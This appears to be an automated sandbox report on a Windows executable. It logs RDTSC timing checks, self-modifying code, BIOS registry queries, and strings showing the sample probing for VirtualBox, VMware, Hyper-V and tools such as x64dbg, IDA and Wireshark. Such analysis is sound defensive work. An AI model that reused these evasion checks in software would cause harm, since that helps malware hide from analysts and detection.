Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD1579 second address: 6DD159E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98351AAB1Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ecx, dword ptr [esi+2Ch] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F98351AAB1Dh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD159E second address: 6DD1649 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9834D75051h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+2Ch], ecx 0x0000000c jmp 00007F9834D7504Eh 0x00000011 mov ax, word ptr [esi+30h] 0x00000015 pushad 0x00000016 call 00007F9834D7504Eh 0x0000001b mov ah, 13h 0x0000001d pop edx 0x0000001e mov eax, 07F6E963h 0x00000023 popad 0x00000024 mov word ptr [edx+30h], ax 0x00000028 jmp 00007F9834D75056h 0x0000002d mov ax, word ptr [esi+32h] 0x00000031 jmp 00007F9834D75050h 0x00000036 mov word ptr [edx+32h], ax 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d pushfd 0x0000003e jmp 00007F9834D7504Dh 0x00000043 or ch, FFFFFFC6h 0x00000046 jmp 00007F9834D75051h 0x0000004b popfd 0x0000004c jmp 00007F9834D75050h 0x00000051 popad 0x00000052 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD1649 second address: 6DD168D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98351AAB1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+34h] 0x0000000c jmp 00007F98351AAB26h 0x00000011 mov dword ptr [edx+34h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F98351AAB27h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD168D second address: 6DD16ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9834D75059h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test ecx, 00000700h 0x0000000f jmp 00007F9834D7504Eh 0x00000014 jne 00007F98A516309Fh 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F9834D7504Ah 0x00000021 sub eax, 370842B8h 0x00000027 jmp 00007F9834D7504Bh 0x0000002c popfd 0x0000002d popad 0x0000002e or dword ptr [edx+38h], FFFFFFFFh 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD16ED second address: 6DD16F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD16F1 second address: 6DD16F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD16F5 second address: 6DD16FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD16FB second address: 6DD1701 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD1701 second address: 6DD1705 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD1705 second address: 6DD1717 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 or dword ptr [edx+3Ch], FFFFFFFFh 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD1717 second address: 6DD171B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD171B second address: 6DD171F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD171F second address: 6DD1725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD1725 second address: 6DD1794 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F9834D75050h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d or dword ptr [edx+40h], FFFFFFFFh 0x00000011 jmp 00007F9834D75050h 0x00000016 pop esi 0x00000017 jmp 00007F9834D75050h 0x0000001c pop ebx 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F9834D7504Eh 0x00000024 and cl, 00000008h 0x00000027 jmp 00007F9834D7504Bh 0x0000002c popfd 0x0000002d movzx ecx, dx 0x00000030 popad 0x00000031 leave 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 mov eax, 6D420813h 0x0000003a mov si, 126Fh 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6E20C53 second address: 6E20C59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6E20C59 second address: 6E20D1D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9834D75052h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F9834D75050h 0x0000000f push eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F9834D75051h 0x00000017 jmp 00007F9834D7504Bh 0x0000001c popfd 0x0000001d pushfd 0x0000001e jmp 00007F9834D75058h 0x00000023 adc ax, 97E8h 0x00000028 jmp 00007F9834D7504Bh 0x0000002d popfd 0x0000002e popad 0x0000002f xchg eax, ebp 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 pushfd 0x00000034 jmp 00007F9834D7504Bh 0x00000039 and cx, F72Eh 0x0000003e jmp 00007F9834D75059h 0x00000043 popfd 0x00000044 pushfd 0x00000045 jmp 00007F9834D75050h 0x0000004a xor ax, 6CA8h 0x0000004f jmp 00007F9834D7504Bh 0x00000054 popfd 0x00000055 popad 0x00000056 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6E20D1D second address: 6E20D77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98351AAB29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c push ecx 0x0000000d mov ebx, 0F84429Eh 0x00000012 pop ebx 0x00000013 movzx eax, dx 0x00000016 popad 0x00000017 pop ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F98351AAB28h 0x00000021 add ch, FFFFFF98h 0x00000024 jmp 00007F98351AAB1Bh 0x00000029 popfd 0x0000002a mov ch, 5Ah 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6E20D77 second address: 6E20D7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DC00E3 second address: 6DC00E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DC00E9 second address: 6DC0151 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9834D7504Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F9834D7504Eh 0x00000011 push eax 0x00000012 jmp 00007F9834D7504Bh 0x00000017 xchg eax, ebp 0x00000018 jmp 00007F9834D75056h 0x0000001d mov ebp, esp 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 pushfd 0x00000023 jmp 00007F9834D7504Ch 0x00000028 or ax, 8358h 0x0000002d jmp 00007F9834D7504Bh 0x00000032 popfd 0x00000033 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DC0151 second address: 6DC0155 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DC0155 second address: 6DC0178 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ebx, esi 0x00000008 popad 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9834D75057h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6D6003B second address: 6D6003F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6D6003F second address: 6D60043 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6D60043 second address: 6D60049 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6D606CE second address: 6D60701 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9834D75059h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F9834D7504Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6D60701 second address: 6D60705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6D60705 second address: 6D60721 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9834D75058h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6D60AD9 second address: 6D60B08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F98351AAB1Bh 0x00000009 jmp 00007F98351AAB23h 0x0000000e popfd 0x0000000f mov dx, ax 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6D60B08 second address: 6D60B0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6D60B0D second address: 6D60B26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F98351AAB25h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6D60B26 second address: 6D60B2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6D60B2A second address: 6D60B4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F98351AAB26h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6D60B4D second address: 6D60B51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6D60B51 second address: 6D60B57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DB094F second address: 6DB095E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9834D7504Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6D90014 second address: 6D90048 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98351AAB1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov al, 31h 0x0000000d mov bx, 84B4h 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F98351AAB29h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6D90048 second address: 6D9008F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9834D75057h 0x00000009 and ah, FFFFFFAEh 0x0000000c jmp 00007F9834D75059h 0x00000011 popfd 0x00000012 mov ebx, eax 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov al, bl 0x0000001d movzx ecx, di 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6D9008F second address: 6D90095 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6D90095 second address: 6D90099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6D90099 second address: 6D900F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98351AAB24h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007F98351AAB20h 0x00000012 and esp, FFFFFFF0h 0x00000015 jmp 00007F98351AAB20h 0x0000001a sub esp, 44h 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F98351AAB27h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6D900F4 second address: 6D9013E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9834D7504Fh 0x00000009 xor eax, 39E00BDEh 0x0000000f jmp 00007F9834D75059h 0x00000014 popfd 0x00000015 mov dx, si 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebx 0x0000001c pushad 0x0000001d mov bh, ah 0x0000001f mov esi, ebx 0x00000021 popad 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 movsx edx, ax 0x00000029 mov edx, eax 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6D9013E second address: 6D9015E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 push ebx 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e call 00007F98351AAB1Eh 0x00000013 pop eax 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6D9015E second address: 6D901E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9834D7504Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F9834D7504Eh 0x00000011 and si, B7C8h 0x00000016 jmp 00007F9834D7504Bh 0x0000001b popfd 0x0000001c mov bx, si 0x0000001f popad 0x00000020 push eax 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F9834D7504Bh 0x00000028 sbb ch, 0000000Eh 0x0000002b jmp 00007F9834D75059h 0x00000030 popfd 0x00000031 push eax 0x00000032 push edx 0x00000033 pushfd 0x00000034 jmp 00007F9834D7504Eh 0x00000039 sub ah, FFFFFF88h 0x0000003c jmp 00007F9834D7504Bh 0x00000041 popfd 0x00000042 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6D9030D second address: 6D90313 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6D90313 second address: 6D90317 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6D90317 second address: 6D9033B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98351AAB27h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6D9033B second address: 6D90356 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9834D75057h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DC0471 second address: 6DC0486 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98351AAB1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d mov dh, 74h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DC0486 second address: 6DC049B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9834D7504Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c mov al, bl 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DC049B second address: 6DC049F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DC049F second address: 6DC04F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F9834D7504Ch 0x00000011 or ax, B6C8h 0x00000016 jmp 00007F9834D7504Bh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007F9834D75058h 0x00000022 jmp 00007F9834D75055h 0x00000027 popfd 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DC04F8 second address: 6DC056B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F98351AAB27h 0x00000009 add cl, 0000001Eh 0x0000000c jmp 00007F98351AAB29h 0x00000011 popfd 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov ebp, esp 0x00000019 jmp 00007F98351AAB1Ch 0x0000001e push dword ptr [ebp+04h] 0x00000021 pushad 0x00000022 push ecx 0x00000023 mov ah, dl 0x00000025 pop eax 0x00000026 mov ebx, 60B29E3Ah 0x0000002b popad 0x0000002c push dword ptr [ebp+0Ch] 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F98351AAB23h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DC056B second address: 6DC0588 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9834D75059h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6E30AD8 second address: 6E30AED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98351AAB21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6E30AED second address: 6E30AF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6E30AF3 second address: 6E30AF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6E30AF7 second address: 6E30B97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 pushad 0x0000000a call 00007F9834D75052h 0x0000000f mov cx, 5121h 0x00000013 pop ecx 0x00000014 pushfd 0x00000015 jmp 00007F9834D75057h 0x0000001a adc eax, 1D9D27CEh 0x00000020 jmp 00007F9834D75059h 0x00000025 popfd 0x00000026 popad 0x00000027 mov dword ptr [esp], ebp 0x0000002a jmp 00007F9834D7504Eh 0x0000002f mov ebp, esp 0x00000031 pushad 0x00000032 jmp 00007F9834D7504Eh 0x00000037 jmp 00007F9834D75052h 0x0000003c popad 0x0000003d mov dl, byte ptr [ebp+14h] 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007F9834D7504Ah 0x00000049 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6E30B97 second address: 6E30BA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98351AAB1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6E30BA6 second address: 6E30BAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6E30BAC second address: 6E30BB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\28PCC9oa8s.exeSpecial instruction interceptor: First address: 74DDAC instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\28PCC9oa8s.exeSpecial instruction interceptor: First address: 74DE7C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\28PCC9oa8s.exeSpecial instruction interceptor: First address: 74B5C2 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\28PCC9oa8s.exeSpecial instruction interceptor: First address: 919F69 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\28PCC9oa8s.exeSpecial instruction interceptor: First address: 901479 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\28PCC9oa8s.exeSpecial instruction interceptor: First address: 97A4F4 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\28PCC9oa8s.exeCode function: 0_2_06DA08F3 rdtsc 0_2_06DA08F3
Source: C:\Users\user\Desktop\28PCC9oa8s.exeAPI coverage: 4.6 %
Source: C:\Users\user\Desktop\28PCC9oa8s.exe TID: 7676Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\28PCC9oa8s.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\28PCC9oa8s.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: 28PCC9oa8s.exe, 28PCC9oa8s.exe, 00000000.00000002.1711627852.00000000008D1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Amcache.hve.5.drBinary or memory string: VMware
Source: Amcache.hve.5.drBinary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin
Source: Amcache.hve.5.drBinary or memory string: VMware, Inc.
Source: Amcache.hve.5.drBinary or memory string: VMware20,1hbin@
Source: Amcache.hve.5.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.5.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.5.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: 28PCC9oa8s.exeBinary or memory string: Hyper-V RAW
Source: Amcache.hve.5.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: 28PCC9oa8s.exe, 00000000.00000003.1308418822.0000000006FEF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: 28PCC9oa8s.exe, 00000000.00000003.1339822785.0000000006631000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlS?
Source: Amcache.hve.5.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.5.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.5.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: 28PCC9oa8s.exe, 00000000.00000002.1712666918.00000000014F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll7
Source: Amcache.hve.5.drBinary or memory string: vmci.sys
Source: 28PCC9oa8s.exe, 00000000.00000003.1308418822.0000000006FEF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
